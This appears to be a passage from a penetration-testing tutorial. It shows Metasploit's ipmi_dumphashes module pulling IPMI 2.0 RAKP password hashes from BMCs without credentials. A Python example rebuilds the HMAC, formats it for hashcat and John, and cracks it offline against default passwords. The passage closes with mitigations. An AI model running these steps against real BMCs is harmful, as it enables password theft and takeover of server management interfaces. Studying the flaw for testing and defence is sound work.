Let's perform the following steps:
- We start Metasploit:
- Search for IPMI-related exploits using the following command:
search ipmi
The output of the preceding command is shown in the following screenshot:
- Use the IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval module (CVE-2013-4786). Note that this is an auxiliary scanner module rather than an exploit: it needs no valid credentials, because the RAKP handshake returns an HMAC-SHA1 keyed with the requested user's password before the client has proven anything. The search output lists other IPMI auxiliary modules, such as cipher_zero (the cipher suite 0 authentication bypass), which are worth trying as well:
use auxiliary/scanner/ipmi/ipmi_dumphashes
- To see options, type the following command:
show options
The output of the preceding command is shown in the following screenshot:
Here we see the CRACK_COMMON option, which is enabled by default: the module tries a built-in list of common IPMI passwords against every hash as it is retrieved. The OUTPUT_HASHCAT_FILE and OUTPUT_JOHN_FILE options save the captured hashes for offline cracking of anything the built-in list misses (hashcat mode 7300, or John the Ripper's rakp format). RPORT defaults to 623, the IPMI-over-LAN UDP port.
- Set RHOSTS to the target BMC address or range and run. On success, the module prints each user's retrieved hash and, for any password found in its common-password list, the cracked cleartext:
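The whole recipe in one place, as an added example that is not part of the book or of the Metasploit module: the Python below reconstructs what ipmi_dumphashes receives from the BMC (the RAKP Message 2 authentication code, an HMAC-SHA1 keyed with the target user's password over session values the remote console already knows), writes it in the forms hashcat mode 7300 and John's rakp format accept, and cracks it offline against a short password list the way CRACK_COMMON does. All session IDs, nonces, the GUID, the password list and the target account are constructed values, and the network exchange is simulated rather than sent.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed shortlist of well-known BMC default passwords; Metasploit ships a
# larger list and tries it automatically when CRACK_COMMON is true.
COMMON_IPMI_PASSWORDS = ["admin", "password", "ADMIN", "root", "calvin", "changeme"]


def rakp2_salt(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
               guid_c: bytes, role_m: int, username: str) -> bytes:
    """Bytes the BMC signs in RAKP Message 2 (IPMI 2.0 specification):
    SIDm | SIDc | Rm | Rc | GUIDc | ROLEm | ULENm | UNAMEm.
    Every field is either chosen by the remote console or sent to it in the
    clear, so the console can rebuild this "salt" without knowing the password."""
    if len(sid_m) != 4 or len(sid_c) != 4:
        raise ValueError("session IDs are 4 bytes")
    if len(rand_m) != 16 or len(rand_c) != 16 or len(guid_c) != 16:
        raise ValueError("Rm, Rc and GUIDc are 16 bytes")
    uname = username.encode()
    return sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role_m, len(uname)]) + uname


def rakp2_auth_code(password: str, salt: bytes) -> bytes:
    """Key Exchange Authentication Code the BMC returns: HMAC-SHA1 keyed with
    the user's password. It is sent before the console has authenticated,
    which is the defect ipmi_dumphashes relies on."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def to_hashcat(salt: bytes, code: bytes) -> str:
    """Input line for hashcat -m 7300 (IPMI2 RAKP HMAC-SHA1)."""
    return f"{salt.hex()}:{code.hex()}"


def to_john(username: str, salt: bytes, code: bytes) -> str:
    """Input line for john --format=rakp."""
    return f"{username}:$rakp${salt.hex()}${code.hex()}"


def crack_hashcat_line(line: str, candidates: Iterable[str]) -> Optional[str]:
    """What CRACK_COMMON does: recompute the HMAC for each candidate password
    and compare it with the captured code. This runs fully offline, so the
    BMC's lockout policy never sees a single attempt."""
    salt_hex, hash_hex = line.strip().split(":")
    salt, target = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
    for pw in candidates:
        if hmac.compare_digest(rakp2_auth_code(pw, salt), target):
            return pw
    return None


def demo() -> dict:
    """Simulated exchange with constructed values: the console picks SIDm and
    Rm, the BMC answers with SIDc, Rc, GUIDc and the auth code for user ADMIN."""
    username, bmc_password = "ADMIN", "calvin"                  # constructed target account
    sid_m, rand_m = b"\xa5\x00\x00\x00", bytes(range(16))       # console side
    sid_c, rand_c = b"\x02\x00\x00\x00", bytes(range(16, 32))   # BMC side
    guid_c = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed BMC GUID
    role_m = 0x04                                               # requested privilege: Administrator
    salt = rakp2_salt(sid_m, sid_c, rand_m, rand_c, guid_c, role_m, username)
    code = rakp2_auth_code(bmc_password, salt)                  # payload of RAKP Message 2
    hc_line = to_hashcat(salt, code)
    return {
        "hashcat": hc_line,
        "john": to_john(username, salt, code),
        "cracked": crack_hashcat_line(hc_line, COMMON_IPMI_PASSWORDS),
    }


if __name__ == "__main__":
    result = demo()
    print("hashcat line:", result["hashcat"])
    print("john line:   ", result["john"])
    print("cracked:     ", result["cracked"])
```

The point worth taking from the example is that the hash is handed out without any authentication and cracked without any further contact with the target, so account lockout on the BMC does not help. The weakness is in the IPMI 2.0 RAKP design itself rather than in one vendor's firmware; the practical mitigations are keeping UDP port 623 off any network an attacker can reach and using long random BMC passwords that no wordlist will contain.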